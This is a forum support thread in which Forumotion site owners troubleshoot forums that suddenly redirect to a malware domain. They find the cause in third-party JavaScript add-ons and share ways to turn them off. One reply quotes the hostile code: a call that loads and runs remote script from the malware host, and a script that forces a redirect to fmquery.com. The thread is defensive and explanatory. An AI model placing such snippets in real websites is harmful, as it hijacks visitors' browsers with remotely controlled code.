Domain name redirects to http://www.malware-site.www/
Hello, since earlier today my forum's domain name http://www.coxengineforum.com/ has automatically been redirecting to http://www.malware-site.www/ I have had my domain name "http://www.coxengineforum.com/" for the last year and was offered by Forumotion. I renewed it about a week ago and it was supposed to actually expire today. Last I checked which was a day or so ago, it said it has been processed. The forum loads for about a second and then redirects to "http://www.malware-site.www/". I believe I did have the forum set to redirect the forumotion address to the custom domain address so the forumotion address "http://coxengineforum.forumakers.com/" won't load it either. Just looking for an answer or some help, wondering if this issue will pass and go away after tomorrow.
Thanks, Jacob
Thanks, Jacob
Re: Domain name redirects to http://www.malware-site.www/
I am having this same issue however, I've just resolved my problem by disabling one of my current JS codes which redirects to FMQuery.
By any chance do you have the 'Registration Validation' or any other FMQuery script in your forums JS Codes? If so uncheck 'in all pages' until the issue subsides.

I actually have been logged out and cannot load the login page to login and access the Admin Panel.
Re: Domain name redirects to http://www.malware-site.www/
Be sure to cancel the page before it fully loads each time until you can access the administration panel to inspect your JS Codes.nitroengine wrote:I actually have been logged out and cannot load the login page to login and access the Admin Panel.

My forum is doing this too! How does you cancel the page before it loads. I cannot get to my administration panel either.

No way of canceling the page as it is loaded before any solution can be taken.

Re: Domain name redirects to http://www.malware-site.www/
Okay, I just solved the issue. I turned off the JavaScript in my browser which allowed my forum to load. I logged in, opened the admin panel and disabled the Java in my forum. I then re-enabled the Java in my browser to make sure the forum loads without redirecting and it worked! I will have to go back and find which code was causing the issue. Hopefully this works for everyone else with this issue.
Thanks for everyone's help.

Thank you my friend - it worked on my end also and I believe this is the script:

Looks to be the same issue for me. I have removed the Registration Validation script and everything seems to be fine.
Thanks

Re: Domain name redirects to http://www.malware-site.www/
Where do I go to disable the redirections once I'm in the admin panel?

Re: Domain name redirects to http://www.malware-site.www/
As nitroengine mentioned check no for 'Enable Javascript code management' and save.
You can also disable just the one script that should be causing it which is 'Registration Validation' by clicking the edit button on it and unchecking 'in all the pages' then hit save. I added 'Registration Validation(DISABLED)' in the title to remind me that the code is currently disabled.

Re: Domain name redirects to http://www.malware-site.www/
Yup, I was having this problem as well, although I couldn't cancel the page before it redirected, and disabling javascript didn't work, so I just added fmquery.com to my restricted sites and it worked like a charm. I then disabled the registration validation and it appears to be working ~

Re: Domain name redirects to http://www.malware-site.www/
It's definitely the Registration Validation script that is the culprit.

Re: Domain name redirects to http://www.malware-site.www/
I've checked into my JS Management and all. There's no code there for me to turn off, and even when I disable JavaScript altogether it still redirects. When I disable JS in my browser it continues to redirect. Is there something I'm missing here?

Re: Domain name redirects to http://www.malware-site.www/
In order for me to stop it i had to uncheck Registration and FMchat v5.0 as it has the redirect in there too.

Re: Domain name redirects to http://www.malware-site.www/
I'd recommended disabling any scripts which refer to fmquery at this time. You can check if they refer to fmquery by looking for something similar to this:
The script its currently grabbing is this:
- Code:
$.getScript("http://malware-site.www");
The script its currently grabbing is this:
- Code:
var redir_url = 'http://www.fmquery.com/'; if (window != top) { top.location.href = redir_url; } else { window.location = redir_url; }

Re: Domain name redirects to http://www.malware-site.www/
The only ones doing it for me is the Pop out chat and Registration. Those unchecked forum loads fine now.

Re: Domain name redirects to http://www.malware-site.www/
My JS is disabled completely. I don't have any scripts that were added by me in general. To my understanding, I don't have the FM Chat or the Registration Validation thing that everyone is talking about.

Nevermind. >.>; I was being an idiot. I had FM v3.0 or something along those lines in my Widgets. I apologize for the double post. I needed to correct myself.

I re enabled my FMchat 5.0 and it longer loads the chat, but the page isnt redirecting. Not sure but something up with that site and messing with the chat.

Re: Domain name redirects to http://www.malware-site.www/
Thanks a lot for this! My forum was doing it as well, but after disabling the Registration Validation Java code it works smooth once again!
Re: Domain name redirects to http://www.malware-site.www/
Hello,
If you're getting this problem, please do what SethC1995 suggested above, disable the javascript that you have that relates to registration validation and FM Chatbox, there's a reference thread for this:
